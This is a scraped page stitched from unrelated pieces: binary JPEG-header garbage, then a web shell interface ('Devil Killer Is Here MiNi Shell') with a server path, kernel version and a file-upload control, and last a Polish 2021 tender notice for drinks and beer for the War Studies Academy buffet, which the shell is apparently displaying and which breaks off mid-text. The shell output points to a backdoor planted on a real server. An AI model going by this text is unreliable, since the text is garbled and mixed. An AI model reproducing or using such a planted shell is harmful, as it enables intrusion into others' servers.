JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033867901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA NAPOJÓW BEZALKOHOLOWYCH oraz <br/>DOSTAWA PIWA DO BUFETU GASTRONOMICZNEGO <br/>AKADEMII SZTUKI WOJENNEJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuki Wojennej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011574244</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. gen. Antoniego Chruściela 103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-910</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">j.taborska@akademia.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wojsko-polskie.pl/aszwoj/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA NAPOJÓW BEZALKOHOLOWYCH oraz <br/>DOSTAWA PIWA DO BUFETU GASTRONOMICZNEGO <br/>AKADEMII SZTUKI WOJENNEJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e552425-694b-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00338679</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002459/22/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.62 Dostawa piwa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://akademia-mil.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Postępowanie o udzielenie<br/>zamówienia publicznego prowadzone jest w formie elektronicznej za pośrednictwem Platformy pod<br/>adresem:<br/>https://akademia-mil.ezamawiajacy.pl/servlet/HomeServlet.<br/>2. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy.<br/>3. Osobą uprawnioną do porozumiewania się z Wykonawcami jest p. Jolanta TABORSKA<br/>e-mail: j.taborska@akademia.mil.pl<br/>4. Komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między zamawiającym a Wykonawcami,<br/>uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się za pośrednictwem Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wszyscy Wykonawcy w celu bezproblemowej komunikacji z Zamawiającym na Platformie powinni<br/>przed upływem terminu składania ofert przystąpić do postępowania na Platformie poprzez funkcję<br/>„Przystąp do postępowania” oraz posiadać założone konto w aplikacji Marketplanet OnePlace.<br/>2. W celu bezproblemowej pracy z Platformą, Wykonawca powinien posiadać co najmniej:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>56 KB/s;<br/>2) komputer klasy PC z zainstalowanym systemem operacyjnym Microsoft Windows XP/Vista/Windows<br/>7/ Windows 10; w przypadku komputera z systemem operacyjnym Microsoft Windows 7/ Windows 8<br/>przeglądarka MS Internet Explorer 10.0 (lub nowsza) z obsługą Active X lub dla systemów<br/>operacyjnych XP/Vista/Windows 7/Windows 8 przeglądarka Firefox z obsługą Javy, siła szyfrowania:<br/>128bit; w przypadku komputera z systemem operacyjnym Microsoft Windows 10 przeglądarka MS<br/>Internet Explorer 11 z obsługą Active X lub Firefox<br/>z obsługą Javy, siła szyfrowania: 128bit;<br/>3) zainstalowaną dowolną przeglądarkę internetową: Chrome; Mozilla Firefox;<br/>4) włączoną obsługę JavaScript;<br/>5) podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez Wykonawcę.<br/>3. Dopuszczalny format kwalifikowanego podpisu elektronicznego:<br/>1) dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy<br/>należy użyć formatu XAdES. W takiej sytuacji należy załączyć oddzielny plik<br/>z podpisem (w takiej sytuacji Wykonawca winien upewnić się, że załącza oba<br/>pliki, tj. plik z treścią dokumentu oraz plik z podpisem elektronicznym).<br/>3) Zamawiający zaleca, aby kwalifikowany podpis elektroniczny, którym posługuje<br/>się Wykonawca był podpisem wydanym na terenie Rzeczpospolitej Polskiej,<br/>bądź innych krajów należących do Unii Europejskiej.<br/>4. Obsługiwane przez Platformę formaty przesyłanych danych tj. plików o wielkości<br/>do 100 MB w formatach: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx,<br/>csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4,<br/>ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES,<br/>PAdES, CAdES, ASIC, XMLenc.<br/>5. Każdy plik załączony i zapisany przez Wykonawcę na Platformie, widoczny jest<br/>w Systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero<br/>po automatycznym odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>6. Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego<br/>datę oraz dokładny czas (hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data &#34;-<br/>czas lokalny serwera synchronizowany odpowiednim źródłem czasu.<br/>7. Format kodowania treści w obrębie platformy - UTF8.<br/>8. Cała komunikacja pomiędzy użytkownikiem Systemu a serwerem jest wykonywana przy użyciu<br/>bezpiecznego protokołu HTTPS (szyfrowanie TLS).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych<br/>przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego jest<br/>Akademia Sztuki Wojennej z siedzibą przy Al. gen. Antoniego Chruściela „Montera” 103, 00-910<br/>Warszawa.2.Administrator wyznaczył Inspektora Ochrony Danych z którym można się skontaktować<br/>się za pośrednictwem adresu e-mail: iod@akademia.mil.pl3. Dane osobowe będą przetwarzane w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną ich<br/>przetwarzania jest art. 6 ust.1 lit. c RODO w związku z ustawą Prawo zamówień publicznych i<br/>rozporządzeniem Ministra Rozwoju w sprawie rodzajów dokumentów, jakich może żądać zamawiający<br/>od wykonawcy w postępowaniu i udzielenie zamówienia.4. Dane osobowe przechowywane będą przez<br/>okres niezbędny, wynikający z przepisów, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza<br/>4lata, okres przechowywania obejmuje cały czas trwania umowy;5. Dane osobowe pozyskane w<br/>związku z postępowaniem o udzielenie zamówienia publicznego<br/>przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady<br/>postępowanie o udzielenie zamówienia publicznego jest jawne</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Ograniczenie dostępu do danych osobowych może<br/>wystąpić tylko w przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z ustawą Prawo<br/>zamówień publicznych. 2. Dane nie będą przekazywane do państwa trzeciego ani do organizacji<br/>międzynarodowej. 3. Osobie, której dane dotyczą przysługuje prawo:- dostępu do danych osobowych<br/>przy czym w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO<br/>wymagałoby dużego wysiłku zamawiający może żądać od osoby której dane dotyczą dodatkowych<br/>informacji, - żądania sprostowania dotyczących jej danych osobowych, - ograniczenia przetwarzania w<br/>przypadkach wymienionych w RODO przy czym żądanie nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. 4.Osobie której<br/>dane dotyczą nie przysługuje prawo do przenoszenia danych osobowych, ich usunięcia ani prawo<br/>Ogłoszenie nr 2021/BZP 00261649/01 z dnia 2021-11-08<br/>2021-11-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>wniesienia sprzeciwu, ponieważ przetwarzanie danych odbywa się na podstawie art. 6 ust.1 lit. c<br/>RODO. 4. W trakcie przetwarzania danych nie będzie dochodziło do zautomatyzowanego<br/>podejmowania decyzji, ani do profilowania. 5. Osobie, której dane dotyczą przysługuje prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych osobowych (adres: 00-193 Warszawa, ul.<br/>Stawki 2).11. Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienia<br/>publiczne nie jest obowiązkowe ale niezbędne do wzięcia w nim udziału. Zamawiający może żądać ich<br/>podania na podstawie przepisów ustawy Prawo zamówień publicznych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PK.ZZP.261.47-48.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Różne rodzaje napojów bezalkoholowych zgodnie z opisem zawartym w załączniku nr 1.1. do SWZ przeznaczonych do zbytu w bufecie gastronomicznym należącym do Zamawiającego. W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do dostarczenia wielu rodzajów i gatunków napojów.<br/>W związku z powyższym, jeżeli Wykonawca oferuje produkty równoważne, musi zapewnić wielość ich rodzajów i gatunków, nie mniejszą niż ilość rodzajów<br/>i gatunków wskazanych w SWZ oraz spełnić wszystkie wymagania tam zawarte.<br/>1.	Szczegółowy opis, zakres i ilość poszczególnych asortymentów zostały zawarte <br/>w załącznik nr 1.1 do SWZ – Formularz ofertowy.<br/>2.	Szczegółowe wymagania i sposób realizacji zamówienia zawiera (załącznik Nr 4 do SWZ – wzór umowy).<br/>3.	Zamawiający wymaga, aby dostarczane produkty będące przedmiotem zamówienia były zgodne z wymaganiami określonymi w załączniku nr 1.1 do SWZ oraz były wolne od wad. <br/>4. Wykonawca dostarczy wyłącznie produkty opatrzone znakami, atestami i zezwoleniami dopuszczającymi te produkty do obrotu rynkowego. <br/>5.	Produkty muszą być wyprodukowane, zapakowane i dostarczone zgodnie <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia <br/> (t.j. Dz. U. z 2020 r. poz. 2021);<br/>2)	ustawą z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych <br/> (t.j. Dz.U. z 2021 r. poz. 630 ze zm.); <br/>6.	Wykonawca dostarczy artykuły własnym transportem, na własny koszt i na własne ryzyko. <br/>7.	Wykonawca zobowiązany jest do posiadania przez cały okres realizacji umowy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej posiadającą rozszerzony zakres ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty wyprodukowane, dostarczone, sprzedane przez ubezpieczonego i spowodowane przez niewykonanie lub nienależyte wykonanie zamówienia w okresie ubezpieczenia, <br/>a wartość polisy będzie na kwotę nie niższą niż równowartość niniejszej umowy. <br/>8.	Dostawy będą realizowane sukcesywnie na podstawie jednostkowych zamówień Zamawiającego (zawierających rodzaj oraz ilość artykułów) w terminie od 3 do 5 dni roboczych licząc od następnego dnia od otrzymania zgłoszenia (zgodnie ze złożoną ofertą – Termin realizacji jednostkowego zamówienia jest poza cenowym kryterium oceny ofert). Dostawy odbywać się będą w godzinach od 7:30 do 13:00. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15980000-1 - Napoje bezalkoholowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie podlegają tylko oferty niepodlegające odrzuceniu.<br/>2.	Kryterium oceny ofert i jego znaczenie oraz opis sposobu oceny ofert:<br/>1)	Cena (C) – 60 %<br/>2)	Termin realizacji jednostkowego zamówienia (T) – 40%<br/><br/>Ad. 1 Za kryterium cena Wykonawca może otrzymać maksymalnie – 60 punktów. <br/><br/>Liczba punktów wg kryterium cena „C” zostanie obliczona na podstawie poniższego wzoru: <br/> Cn <br/>C = ------------x 60<br/> Cob <br/> gdzie: <br/>C - liczba punktów za kryterium cena<br/>Cn - najniższa cena brutto <br/>Cob - cena brutto oferty badanej <br/><br/>Ad. 2 Za kryterium - termin dostawy (T), Wykonawca może otrzymać maksymalnie 40 punktów.<br/>Liczba punktów w ramach kryterium termin realizacji jednostkowego zamówienia zostanie przyznana w następujący sposób:<br/>	za 5 dni roboczych – 0 pkt<br/>	za 4 dni robocze – 10 pkt<br/>	za 3 dni robocze – 30 pkt<br/>	za 2 dni robocze – 40 pkt<br/><br/>Termin dostawy liczony jest od następnego dnia po dniu, otrzymania zamówienia..<br/> <br/>Uwaga: Wykonawca nie może zaproponować terminu realizacji jednostkowego zamówienia innego niż podane powyżej. Jeżeli Wykonawca zaproponuje termin realizacji jednostkowego zamówienia, krótszy niż 2 dni robocze lub dłuższy niż 5 dni roboczych, bądź poda wartość inną niż w/w to Zamawiający uzna taką ofertę za niezgodną z treścią SWZ i oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Prawo zamówień Publicznych (Dz. U. <br/>z 2021 r. poz. 1129). <br/> <br/>Punkty uzyskane przez ofertę zostaną zsumowane wg wzoru:<br/><br/>Su = C + T<br/> gdzie:<br/>Su - suma punktów wg przyjętych kryteriów; <br/>C - liczba punktów za kryterium cena;<br/>T - liczba punktów za kryterium termin realizacji jednostkowego zamówienia.<br/>3.	Zamawiający przy wyliczaniu punktów za poszczególne kryteria ograniczy się do dwóch miejsc po przecinku.<br/>4.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium <br/>o najwyższej wadze.<br/>5.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/>7.	Jeżeli Zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu.<br/>8.	Weryfikacja kryteriów opisanych w punktach 2, dokonywana będzie na podstawie oświadczenia dokonanego w załącznikach nr 1.1, 1.2 do SWZ – Formularz ofertowy. Brak oświadczenia będzie oceniane jako brak gwarancji dostarczania przedmiotu zamówienia spełniającego zadeklarowane kryteria w okresie obowiązywania umowy, co stanowić będzie <br/>o niezgodności treści oferty z warunkami zamówienia SWZ;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji jednostkowego zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Szczegółowy opis, zakres i ilość poszczególnych asortymentów, zostały zawarte <br/>w załączniku nr 1.2 do SWZ – Formularz ofertowy<br/>2.	Szczegółowe wymagania i sposób realizacji zamówienia zawiera (załącznik Nr 4 do SWZ – wzór umowy).<br/>3.	Zamawiający wymaga, aby dostarczane produkty będące przedmiotem zamówienia były zgodne z wymaganiami określonymi w załączniku nr 1.1 do SWZ oraz były wolne od wad. <br/>4.	Wykonawca dostarczy produkty własnym transportem, na własny koszt i na własne ryzyko.<br/>5.	Wykonawca dostarczy wyłącznie produkty opatrzone znakami, atestami i zezwoleniami dopuszczającymi te produkty do obrotu rynkowego. <br/>6.	Produkty muszą być wyprodukowane, zapakowane i dostarczone zgodnie <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia <br/>(t.j. Dz. U. z 2020 r. poz. 2021);<br/>2)	ustawą z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych <br/>(t.j. Dz.U. z 2021 r. poz. 630 ze zm.); <br/>3)	ustawą z dnia 18 października 2006 r. o wyrobie napojów spirytusowych oraz rejestracji i ochronie oznaczeń geograficznych napojów spirytusowych (t.j. Dz.U. z 2020 r. poz. 1419 ze zm.).<br/>7.	Wykonawca zobowiązany jest do posiadania przez cały okres realizacji umowy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej posiadającą rozszerzony zakres ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty wyprodukowane, dostarczone, sprzedane przez ubezpieczonego i spowodowane przez niewykonanie lub nienależyte wykonanie zamówienia w okresie ubezpieczenia a wartość polisy będzie na kwotę nie niższą niż równowartość niniejszej umowy. <br/>8.	Dostawy będą realizowane sukcesywnie na podstawie jednostkowych zgłoszeń Zamawiającego (zawierających rodzaj oraz ilość artykułów) w terminie od 3 do 5 dni roboczych licząc od następnego dnia od otrzymania zgłoszenia (zgodnie ze złożoną ofertą – Termin realizacji jednostkowego zamówienia jest poza cenowym kryterium oceny ofert). Dostawy odbywać się będą w godzinach od 7:30 do 13:00.<br/>1)	Zamawiający dopuszcza możliwość złożenia produktów równoważnych - tj. <br/> o parametrach technicznych i jakościowych nie gorszych niż produkty wskazane <br/> w SWZ i w tabeli formularza cenowego<br/>2)	w przypadku, gdy Wykonawca powołuje się na rozwiązania równoważne ma on obowiązek wykazać (poprzez załączenie do oferty odpowiednich dokumentów), że oferowane przez niego dostawy spełniają wymagania dotyczące równoważności określone przez Zamawiającego.<br/>Piwo będące przedmiotem zamówienia przeznaczone będzie do zbytu w bufecie gastronomicznym należącym do Zamawiającego. W ramach przedmiotu zamówienia Wykonawca 